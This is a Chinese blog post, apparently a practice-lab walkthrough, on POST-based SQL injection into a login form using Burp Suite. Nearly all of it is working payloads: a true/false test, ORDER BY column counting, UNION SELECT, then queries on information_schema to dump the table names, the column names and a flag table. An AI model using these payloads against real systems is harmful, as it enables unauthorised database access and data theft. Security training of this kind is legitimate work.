sql_lab之sqli中的post注入

发布时间:2023年12月20日

Post注入

用burpsuit抓包去做

Post第一关:(gxa5)

1.判断是否存在注入

username=1'or 1=1 #&password=123&submit=%E7%99%BB%E5%BD%95?有回显

username=1'or 1=2?#&password=123&submit=%E7%99%BB%E5%BD%95?没有回显

则证明存在sql注入

2.判断字段数

username=1'or 1=1 order by 4 #&password=123&submit=%E7%99%BB%E5%BD%95?没有回显

username=1'or 1=1 order by 3?#&password=123&submit=%E7%99%BB%E5%BD%95?有回显

则证明字段数是3

3.用union查询判断回显点

username=1'union select 1,2,3 -- a&password=123&submit=%E7%99%BB%E5%BD%95

4.查出当前数据库名

username=1'union select 1,database(),3 -- a&password=123&submit=%E7%99%BB%E5%BD%95

5.查询当前数据库中的表名

username=1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' -- a&password=123&submit=%E7%99%BB%E5%BD%95

6.查询flag表中的字段名

username=1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='flag' -- a&password=123&submit=%E7%99%BB%E5%BD%95

7.查字段里面的数据

username=1'union select 1,group_concat(id),group_concat(flag) from flag -- a&password=123&submit=%E7%99%BB%E5%BD%95

文章来源:https://blog.csdn.net/qq_59020256/article/details/135116856
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。